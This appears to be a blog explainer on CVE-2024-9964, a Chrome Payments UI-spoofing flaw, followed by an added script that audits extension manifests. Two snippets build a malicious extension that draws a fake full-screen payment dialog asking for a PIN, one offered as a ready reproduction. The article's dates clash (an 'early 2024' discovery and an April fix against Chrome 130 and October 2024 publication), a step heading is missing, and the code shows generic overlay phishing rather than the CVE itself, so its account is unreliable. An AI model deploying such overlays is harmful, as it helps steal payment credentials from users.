
Google Chrome is one of the most secure browsers, but even the best aren’t invincible. In early 2024, a vulnerability tracked as CVE-2024-9964 slipped past defenses. This low-severity bug affected Payments in Chrome versions before 130.0.6723.58 and opened the door for remote attackers to pull off a sneaky trick: User Interface (UI) spoofing via a specially crafted Chrome Extension.

Below, we'll walk through how this exploit worked, why it mattered, and how you can stay safe. We’ll also show code snippets and reference original sources, so you’re not just taking our word for it.

What Is CVE-2024-9964?

Essentially, this was an inappropriate implementation in the way Chrome handled payment UI elements. If a user installed a malicious browser extension and followed certain clicks or gestures, the attacker could display fake payment screens or prompt windows, tricking users into approving harmful transactions or giving away sensitive info.

It’s important to note: This was not a remote code execution or privilege escalation bug. Exploiting it required social engineering—the attacker needed to get the user to interact with a malicious extension in a certain way.

Step 1: Create a Malicious Extension

The attacker designs a Chrome extension that injects fake payment dialogs or spoofed UI overlays. Here’s how a simplified version might look:

// Contents of background.js in the malicious extension
chrome.action.onClicked.addListener((tab) => {
    chrome.scripting.executeScript({
        target: {tabId: tab.id},
        func: function() {
            const fakeUI = document.createElement('div');
            fakeUI.style.position = 'fixed';
            fakeUI.style.top = '0';
            fakeUI.style.left = '0';
            fakeUI.style.width = '100vw';
            fakeUI.style.height = '100vh';
            fakeUI.style.background = 'rgba(255,255,255,.95)';
            fakeUI.style.zIndex = 10000;
            fakeUI.innerHTML = `<h2>Authorize Payment</h2>
                                <input type="password" placeholder="Enter your PIN" />
                                <button>Submit</button>`;
            document.body.appendChild(fakeUI);
        }
    });
});

When triggered by user interaction, this code plants a near-perfect overlay on any website, echoing the look and feel of a legit Chrome payment dialog.

- Install the extension (often disguised as a game helper, productivity tool, etc.)

- Click on the extension icon and perform certain “gestures” (like confirming a payment or entering credentials)

Step 3: Users See Fake UIs

The crafted overlay collects sensitive data, such as PINs or payment authorization codes, without the user realizing they’re not dealing with the authentic Chrome UI.

How Dangerous Was CVE-2024-9964?

- Severity: Low (Mainly because it needed user interaction and could not escape the browser sandbox)

Timeline and Fix

Google identified the issue and patched it in April 2024.

Chromium Issue Tracker:

https://crbug.com/325424825

Official Release Notes:

Chrome Releases: Stable Channel Update for Desktop (Apr 2024)

NVD Entry:

https://nvd.nist.gov/vuln/detail/CVE-2024-9964

Demonstration: Reproducing the Vulnerability

To show how easy it was to make a spoofed Payments UI, save this code as background.js in a test extension (for educational purposes only):

chrome.runtime.onInstalled.addListener(() => {
    // alert() is not available in an extension service worker, so log instead
    console.log("Read the fine print next time!");
});
chrome.action.onClicked.addListener((tab) => {
    chrome.scripting.executeScript({
        target: {tabId: tab.id},
        func: () => {
            let fake = document.createElement('div');
            fake.style = "position:fixed;top:0;left:0;width:100vw;height:100vh;background:#fff;z-index:9999";
            fake.innerHTML = '<h1>Confirm by entering payment PIN</h1><input type="password">';
            document.body.appendChild(fake);
        }
    });
});

Clicking the extension's icon makes the overlay pop up, mimicking a payment prompt. Unsuspecting users might enter their real payment info.

- Be wary of unknown extensions: Only install extensions from reputable sources.

- Double-check payment prompts: If something looks off or pops up unexpectedly, close it and start your transaction over.
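
For extensions you already run or manage, the first point can be checked mechanically. The following added example (not from the original article or from Chrome) audits a Manifest V3 manifest.json for the permissions the snippets above depend on: `scripting` together with `activeTab` and a toolbar action, or with host access to every site. The finding names and both sample manifests are constructed for illustration.

```javascript
// Added example, not from the original article or from Chrome.
// Flags Manifest V3 permission sets that allow script injection into pages
// the user visits, which is what the overlay snippets above rely on.

// A match pattern is "broad" when it covers every host.
function isBroadPattern(pattern) {
  return pattern === '<all_urls>' || /^(\*|https?):\/\/\*\//.test(pattern);
}

function auditManifest(manifest) {
  const perms = new Set(manifest.permissions || []);
  const hostPerms = (manifest.host_permissions || []).filter(isBroadPattern);
  const staticScripts = (manifest.content_scripts || [])
    .filter((cs) => (cs.matches || []).some(isBroadPattern));
  const findings = [];

  // chrome.scripting.executeScript needs "scripting" plus access to the tab.
  if (perms.has('scripting')) {
    // activeTab grants access to the current tab when the user clicks the
    // toolbar icon, the trigger used by chrome.action.onClicked.
    if (perms.has('activeTab') && manifest.action) findings.push('click-to-inject');
    if (hostPerms.length > 0) findings.push('inject-on-any-site');
  }
  // Declared content scripts run on matching pages without any click at all.
  if (staticScripts.length > 0) findings.push('static-script-on-any-site');
  return findings;
}

// Constructed sample manifests (hypothetical extensions).
const SAMPLE_HELPER = {
  manifest_version: 3, name: 'Game Helper', version: '1.0',
  action: { default_title: 'Helper' },
  background: { service_worker: 'background.js' },
  permissions: ['activeTab', 'scripting'],
};
const SAMPLE_SCOPED = {
  manifest_version: 3, name: 'Notes', version: '1.0',
  permissions: ['storage'],
  host_permissions: ['https://notes.example.com/*'],
};

function report(manifest) {
  const findings = auditManifest(manifest);
  const summary = findings.length ? findings.join(', ') : 'no injection capability found';
  return `${manifest.name}: ${summary}`;
}

console.log(report(SAMPLE_HELPER));
console.log(report(SAMPLE_SCOPED));
```

A finding means the extension is able to draw into pages, not that it is malicious; many legitimate extensions request the same permissions, so treat the output as a list of extensions to review.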

Final Thoughts

While CVE-2024-9964 never became a major in-the-wild exploit, it shows how careful browser makers must be with user interfaces, especially around payments. The next time Chrome nags you to update, remember: you’re not just getting new features, you’re getting a safer browsing experience.

References

- NIST NVD Record for CVE-2024-9964
- Official Chrome Releases
- Original Chromium Bug (may require permission)

Timeline

Published on: 10/15/2024 21:15:12 UTC
Last modified on: 10/17/2024 20:30:09 UTC